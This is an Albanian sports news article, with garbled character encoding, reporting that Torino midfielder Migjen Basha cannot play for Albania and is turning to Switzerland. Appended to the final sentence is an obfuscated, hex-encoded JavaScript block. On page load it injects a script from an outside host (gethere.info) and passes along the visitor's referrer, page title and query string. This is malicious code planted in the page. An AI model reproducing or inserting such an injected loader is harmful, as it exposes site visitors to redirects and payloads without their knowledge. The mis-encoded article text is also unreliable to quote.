largea_calcio-serie-b-x1352318833

Migjen Basha a�?dorA�zoheta�?, tani pret ZvicrA�n

FIFA nuk e lejon mesfushorin e Torinos qA� tA� luajA� me KombA�taren shqiptare

Pritjes thuajse dy-vjeA�are tA� Migjen BashA�s pA�r tA� veshur fanellA�n kuqezi duket se i ka ardhur fundi. Mesfushori, qA� po zhvillon paraqitje mjaft tA� mira gjatA� kA�tij sezoni nA� SerinA� A me Torinon, nuk do tA� mund tA� luajA� pA�r ShqipA�rinA�.

PavarA�sisht se Basha kA�rkohej nA� skuadA�r nga ish-trajneri Josip Kuze, federata bA�ri tA� pamundurA�n qA� ta pajiste me psaportA� shqiptare dhe tekniku aktual, Gianni De Biasi e ka vlerA�suar maksimalisht, 25-vjeA�ari A�shtA� dorA�zuar.

FIFA nuk e lejon shqiptarin nga Kosova qA� si rol natyral ka atA� tA� mesfushorit, por qA� nA� fushA�n e lojA�s A�shtA� njA� a�?xhola�? i vA�rtetA�, pasi mbulon disa pozicione. Federata Zvicrane ka bA�rA� tA� ditur se nuk do ti japA� dritA�n jeshile qA� tA� luajA� me ndonjA� skuadA�r tjetA�r dhe pA�rballA� a�?vetosa�? sA� helvetA�ve, ShqipA�ria dhe FIFA nuk mund tA� bA�jnA� asgjA�.

GjithA�ka pA�r faktin se nA� tA� kaluarA�n, Migjen Basha ka luajtur me pA�rfaqA�sueset e moshave tA� ZvicrA�s, nA� njA� kohA� kur nuk ishte i pajisur me psaportA�n shqiptare dhe kjo i djeg pA�rfundimisht shanset qA� ai ti bashkohet KombA�tares.

Pas pritjes sA� gjatA�, pA�r kA�tA� fakt A�shtA� bindur edhe vetA� lojtari. Sipas menaxherit tA� 25-vjeA�arit, Sergio Gabarello, pA�r BashA�n vazhdon interesimi i ZvicrA�s dhe tashmA� lojtari synon qA� tA� luajA� me helvetA�t, nA� mA�nyrA� qA� tA� mos mbetet mA� jashtA� sfidave ndA�rkombA�tare.

Edhe pse konkurrenca te Zvicra A�shtA� e madhe, e ku si kundA�rshtarA� ai do tA� ketA� katA�r lojtarA� tA� tjerA� me origjinA� shqiptare, Shaqirin, XhakA�n, Behramin e Xhemailin, nA�se vazhdon me paraqitjet e mira te Torino nA� elitA�n e futbollit italian, ndoshta shumA� shpejt Migjen Basha mund tA� fitojA� njA� thirrje nA� skuadrA�n e Ottmar Hitzfeld.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}